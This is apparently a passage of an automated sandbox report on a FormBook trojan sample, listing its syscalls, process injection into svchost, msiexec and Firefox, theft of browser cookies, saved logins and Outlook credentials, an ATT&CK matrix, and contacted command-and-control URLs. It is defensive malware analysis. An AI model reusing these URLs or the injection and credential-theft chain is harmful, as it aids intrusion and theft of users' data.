            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 2300Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\0XLuA614VK.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2AB1008Jump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F81201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00F81201
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F62BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F62BA5
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F8B226 SendInput,keybd_event,0_2_00F8B226
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00FA22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00FA22DA
            Source: C:\Users\user\Desktop\0XLuA614VK.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\0XLuA614VK.exe"Jump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F80B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00F80B62
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F81663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00F81663
            Source: 0XLuA614VK.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: sXmdPDASzrmzi.exe, 00000003.00000000.2128390828.0000000001611000.00000002.00000001.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4488367431.0000000001611000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: 0XLuA614VK.exe, sXmdPDASzrmzi.exe, 00000003.00000000.2128390828.0000000001611000.00000002.00000001.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4488367431.0000000001611000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: sXmdPDASzrmzi.exe, 00000003.00000000.2128390828.0000000001611000.00000002.00000001.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4488367431.0000000001611000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: sXmdPDASzrmzi.exe, 00000003.00000000.2128390828.0000000001611000.00000002.00000001.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4488367431.0000000001611000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F40698 cpuid 0_2_00F40698
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F98195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00F98195
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F7D27A GetUserNameW,0_2_00F7D27A
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F5B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00F5B952
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F242DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: 0XLuA614VK.exeBinary or memory string: WIN_81
            Source: 0XLuA614VK.exeBinary or memory string: WIN_XP
            Source: 0XLuA614VK.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: 0XLuA614VK.exeBinary or memory string: WIN_XPe
            Source: 0XLuA614VK.exeBinary or memory string: WIN_VISTA
            Source: 0XLuA614VK.exeBinary or memory string: WIN_7
            Source: 0XLuA614VK.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00FA1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00FA1204
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00FA1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00FA1806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1504851 Sample: 0XLuA614VK.exe Startdate: 05/09/2024 Architecture: WINDOWS Score: 100 31 www.yi992.com 2->31 33 www.wildenmann.shop 2->33 35 19 other IPs or domains 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus detection for URL or domain 2->43 45 5 other signatures 2->45 10 0XLuA614VK.exe 4 2->10         started        signatures3 process4 signatures5 55 Binary is likely a compiled AutoIt script file 10->55 57 Found API chain indicative of sandbox detection 10->57 59 Writes to foreign memory regions 10->59 61 2 other signatures 10->61 13 svchost.exe 10->13         started        process6 signatures7 63 Maps a DLL or memory area into another process 13->63 16 sXmdPDASzrmzi.exe 13->16 injected process8 dnsIp9 25 www.marinamaquiagens.online 15.197.240.20, 57196, 57197, 57198 TANDEMUS United States 16->25 27 www.5a8yly.cfd 72.52.178.23, 57192, 57193, 57194 LIQUIDWEBUS United States 16->27 29 5 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 msiexec.exe 13 16->20         started        signatures10 process11 signatures12 47 Tries to steal Mail credentials (via file / registry access) 20->47 49 Tries to harvest and steal browser information (history, passwords, etc) 20->49 51 Modifies the context of a thread in another process (thread injection) 20->51 53 2 other signatures 20->53 23 firefox.exe 20->23         started        process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            0XLuA614VK.exe61%ReversingLabsWin32.Trojan.Leonem
            0XLuA614VK.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.formytinyhome.com/lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9vH+mS4f3qWyrmk5EaMabwLfk8B7yJXbJanTlK0OvtO++wyfSRGRbh4BKfAxEuo7imst0wg==&sH=nVVHdDTx2PSTVJ0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://www.namesilo.com/whois0%Avira URL Cloudsafe
            http://www.cacingnaga36.click/ssw0/0%Avira URL Cloudsafe
            http://www.bnmlk.org/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fHx8fHw2NmQ5YTM2NDExYzB0%Avira URL Cloudsafe
            http://www.whiskeydecanterset.com/wuux/?sH=nVVHdDTx2PSTVJ&V6h=G8W1V2+ngxJ+E83/0IyfiXupIqoHasoRgPgAY3+/EHQIvd2Wul84Lo8VWixQDtg5AMG3Phy0eNTP33PkrrD0t0eGx0WSmGJ1HH0cwOwxD95TaQSaBMeTfZ443OH1gA0wDQ==0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.thecivilwearsprada06.site/2hp8/0%Avira URL Cloudsafe
            http://www.smokesandhoney.com/ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv5JQLEZFLmm1935WPn1s0g14qVusJPQGgEr6+5yVxfblixZgca2mD/C/dkht+8dQzCD1+Jew==&sH=nVVHdDTx2PSTVJ0%Avira URL Cloudsafe
            http://www.cacingnaga36.click/ssw0/?V6h=EWS2YwJnJiunoUuFc/7D9RbaJ3v4wM/73ZiSCzwa3KkaAEYrAxr2MHaEXaA/BV5/vIbe5XGczNGh+M2iNsrtVcMRpqBE9VdECLv8jlI9PFfIoqokrAMGKtNOgnbIBrYWGQ==&sH=nVVHdDTx2PSTVJ0%Avira URL Cloudsafe
            http://www.4odagiyn.click/f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ0%Avira URL Cloudsafe
            http://www.marinamaquiagens.online/n4sv/?V6h=Rn8sYt8YDaYT7jFf5K1RN21751bCn2USuvRVR0XZr3jMl4ljVezIqMhPdYzWo0QynoEEVao5Nd7ZkOoeHk8KzYmVnd6lY3cEc8VkS42gD8QuE3e2/CTNStdnS6k5rMWW1Q==&sH=nVVHdDTx2PSTVJ0%Avira URL Cloudsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.smokesandhoney.com/ld3u/0%Avira URL Cloudsafe
            http://www.5a8yly.cfd/kfsd/0%Avira URL Cloudsafe
            http://www.bnmlk.org/r6tm/?sH=nVVHdDTx2PSTVJ&V6h=03r06RSocIWRHlQMBHZ7/ZdxuKKmGlmlv7BltFVQgkYFIdRnDBF7O8WDu3tP30gBrpd5Hehkjcnr6TVmd9giBmXATSrzqLCUTktLP3Nid+3n62oF5w/Mdat6l5CFzOydDA==0%Avira URL Cloudsafe
            https://www.namesilo.com0%Avira URL Cloudsafe
            https://d38psrni17bvxu.cloudfront.net/themes/registrar/images/namesilo.svg0%Avira URL Cloudsafe
            http://www.yi992.com/iuti/?V6h=hoHbkVcpbob4KKGwTSg4Qmxuxm4KO3ujR6NVpJZRiS90gufBWzA0W/yR6JGFw3H3NTWRULQgnx1gCbPTi357oLTiVxRhMsTUHJ+Wl6jWlVJ6tv3Z5Sqw5Cg13CqV209vow==&sH=nVVHdDTx2PSTVJ0%Avira URL Cloudsafe
            https://pcnatrk.net/track.0%Avira URL Cloudsafe
            https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
            http://ww1.5a8yly.cfd/kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqb0%Avira URL Cloudsafe
            http://ww7.4odagiyn.click/f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuq0%Avira URL Cloudsafe
            https://www.formytinyhome.com/lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW90%Avira URL Cloudsafe
            https://www.smokesandhoney.com/ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv0%Avira URL Cloudsafe
            https://ac.ecosia.org/autocomplete?q=0%Avira URL Cloudsafe
            http://www.wildenmann.shop/ccpi/0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.4odagiyn.click/f1qc/0%Avira URL Cloudsafe
            https://www.namesilo.com/domain/search-domains0%Avira URL Cloudsafe
            http://www.rigintech.info/ig9u/?V6h=DsbZHDl7ETyucOGSRMDREU0gLqon/JCM1qPnn3cy3RxLEFGk9lVuu2W6wSDxGu+YER8koFm75cmrGcIzTbmZQ3LhDYrene07E1oxIZlh9GtUu7RZMRKLFDCiJnSgV5dMHg==&sH=nVVHdDTx2PSTVJ100%Avira URL Cloudmalware
            http://www.bnmlk.org/r6tm/0%Avira URL Cloudsafe
            http://www.5a8yly.cfd/kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqbwTWogO+vBLUJXWpdaX6FBHI3PARBJ6BBwlCmNGVSn5FdlKflrneiv2THCpchPWcIBHiIkx6LHBCpUWbA==0%Avira URL Cloudsafe
            http://www.formytinyhome.com/lztc/0%Avira URL Cloudsafe
            http://c.parkingcrew.net/scripts/sale_form.js0%Avira URL Cloudsafe
            http://www.marinamaquiagens.online/n4sv/0%Avira URL Cloudsafe
            http://www.4odagiyn.click0%Avira URL Cloudsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%Avira URL Cloudsafe
            http://www.rigintech.info/ig9u/100%Avira URL Cloudmalware
            http://wildenmann.shop/ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo10%Avira URL Cloudsafe
            http://www.yi992.com/iuti/0%Avira URL Cloudsafe
            http://www.wildenmann.shop/ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo1JohGtlH0OSuyloWV4aL4gulV88Z8WUGiHxG/5dbitedT3dwls/KnYRS+O7Xw5tFmWV2oMBDB9F7a8JBDA==0%Avira URL Cloudsafe

